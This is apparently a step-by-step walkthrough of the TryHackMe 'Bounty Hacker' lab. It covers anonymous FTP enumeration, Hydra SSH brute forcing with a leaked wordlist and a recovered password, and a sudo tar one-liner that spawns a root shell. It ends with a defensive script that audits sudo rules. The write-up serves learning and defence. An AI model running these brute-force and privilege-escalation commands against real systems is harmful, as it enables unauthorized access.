Papadope Course

Bounty Hacker - TryHackMe Walkthrough

A beginner-friendly boot2root machine focused on FTP enumeration, SSH brute forcing, and privilege escalation via a misconfigured sudo permission for tar.

Room URL: https://tryhackme.com/room/cowboyhacker

Difficulty: Easy


Tools & Techniques Used

  • Nmap
  • Gobuster
  • FTP (anonymous login)
  • Hydra (SSH brute force)
  • SSH
  • GTFOBins (sudo tar privesc)

Step-by-Step Walkthrough

1. Enumeration

Run an initial scan to identify open services:

nmap -sC -sV -oN nmap.txt <TARGET_IP>

Typical findings:

Port  Service  Notes
21    FTP      Anonymous login allowed
22    SSH      OpenSSH
80    HTTP     Apache web server

2. Web & FTP Enumeration

Web Directory Brute Force

Try Gobuster on HTTP:

gobuster dir -u http://<TARGET_IP> -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php,txt,html

In this room, web enumeration typically leads to dead ends.

FTP Anonymous Access

Connect to FTP anonymously:

ftp <TARGET_IP>
# Username: anonymous
# Password: (leave blank or enter anything)

Download all available files:

mget *

You should retrieve at least two files:

  • tasks.txt or similar — contains a task list with an author name (commonly lin)
  • locks.txt or similar — contains a list of potential passwords

3. Identify Username and Password List

From the task file, note the author’s name (commonly lin).

From the password file, save the list for brute forcing.


4. SSH Brute Force

Use Hydra to brute-force SSH with the discovered username and password list:

hydra -l lin -P locks.txt ssh://<TARGET_IP>

Result: You should obtain a valid password (commonly RedDr4gonSynd1cat3).


5. SSH Login and User Flag

Log in via SSH:

ssh lin@<TARGET_IP>
# Password: <CRACKED_PASSWORD>

Find the user flag, typically on the Desktop:

ls ~/Desktop
cat ~/Desktop/user.txt

6. Privilege Escalation

Check sudo permissions:

sudo -l

You’ll likely see that lin can run /bin/tar as root without a password.

Exploit Sudo Tar

Use the GTFOBins technique to spawn a root shell via tar:

sudo tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/sh

You should now have a root shell.

Collect the root flag, typically in /root/root.txt:

cat /root/root.txt

Notes

  • Redact any real passwords/flags if publishing publicly.
  • Key takeaways:
    • FTP anonymous access can leak usernames and password lists
    • Brute forcing SSH is a common path once you have a username and wordlist
    • Sudo misconfigurations (e.g., tar) are a classic privilege escalation vector
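
For the last takeaway, a defender can audit `sudo -l` output for the same class of rule before an attacker finds it. The script below is an added example, not part of the original walkthrough; the function name, the short binary list and the sample output (including the host name) are assumptions constructed for illustration.

```sh
#!/bin/sh
# Added example: flag sudo grants for binaries that can run other programs.
# RISKY_BINARIES is a short illustrative subset picked for this example;
# tar is the one this walkthrough relies on.
RISKY_BINARIES="tar find vim less awk"

# Reads `sudo -l` output on stdin and prints "<passwd|nopasswd><TAB><path>"
# for every granted command that is ALL or whose basename is in the list.
# Simplification: commas escaped inside command arguments are not handled.
audit_sudo_rules() {
    awk -v risky="$RISKY_BINARIES" '
    BEGIN { n = split(risky, r, " "); for (i = 1; i <= n; i++) bad[r[i]] = 1 }
    /^[ \t]*\(/ {                                  # rule lines start with "(runas)"
        line = $0
        sub(/^[ \t]*\([^)]*\)[ \t]*/, "", line)    # drop the "(root)" part
        np = 0                                     # password required by default
        m = split(line, cmds, /,[ \t]*/)
        for (j = 1; j <= m; j++) {
            c = cmds[j]
            # Tags such as NOPASSWD: carry over to later commands on the line.
            while (match(c, /^[A-Z_]+:[ \t]*/)) {
                tag = substr(c, 1, RLENGTH)
                if (tag ~ /^NOPASSWD:/) np = 1
                else if (tag ~ /^PASSWD:/) np = 0
                c = substr(c, RLENGTH + 1)
            }
            split(c, words, " ")                   # words[1] is the command path
            k = split(words[1], parts, "/")
            if (words[1] == "ALL" || (parts[k] in bad)) {
                label = np ? "nopasswd" : "passwd"
                print label "\t" words[1]
            }
        }
    }'
}

# Constructed sample of `sudo -l` output (host name and extra rules are made up).
SAMPLE_SUDO_L='User lin may run the following commands on examplehost:
    (root) NOPASSWD: /bin/tar
    (root) /usr/bin/find, NOPASSWD: /usr/bin/id
    (root) NOPASSWD: /usr/bin/id, PASSWD: /usr/bin/less'

printf '%s\n' "$SAMPLE_SUDO_L" | audit_sudo_rules
```

Any line it prints is a rule to remove or replace with a narrowly scoped wrapper; `nopasswd` entries are the most urgent because a stolen session is enough to use them.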